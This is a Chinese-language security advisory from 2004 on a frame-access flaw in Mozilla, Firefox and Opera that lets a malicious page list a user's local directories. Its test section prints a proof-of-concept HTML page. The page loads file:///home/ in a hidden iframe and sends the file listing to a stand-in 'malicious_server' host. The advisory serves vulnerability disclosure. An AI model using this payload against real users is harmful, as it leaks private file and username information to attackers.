Mozilla Firefox/Opera文件系统信息泄露漏洞
发布日期:2004-12-01
更新日期:2004-12-02
受影响系统:Mozilla Browser 1.7
Opera Software Opera Web Browser 7.54
Mozilla Firefox 1.0
描述:
Mozilla Firefox/Opera是流行的WEB浏览器。
Mozilla Firefox/Opera在处理帧访问其他帧属性时存在问题,远程攻击者可以利用这个漏洞获得用户系统敏感信息。
问题存在于这些浏览器可以使某个帧访问另外帧或iframe的属性,利用此漏洞,构建恶意页面,诱使用户访问,可导致显示用户目录内容,从而知道用户名等敏感信息。
<*来源:Giovanni Delvecchio (
badpenguin79@hotmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=110191933530703&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Giovanni Delvecchio (
badpenguin79@hotmail.com)提供了如下测试方法:
------ begin code.htm -----
<html>
<body onLoad="
list_files='';
for(i=0;i<local_files.document.links.length;i++)
{list_files+=local_files.document.links.item(i);}
alert(list_files);
//send list_files at malicious_server
document.location.href='
http://malicious_server/grab.php?list='+list_files;
">
<iframe name="local_files" src="file:///home/" height=0
width=0></iframe>
</body>
</html>
------ end of code.htm -------
建议:
厂商补丁:
Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mozilla.org/
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com浏览次数:3423
严重程度:0(网友投票)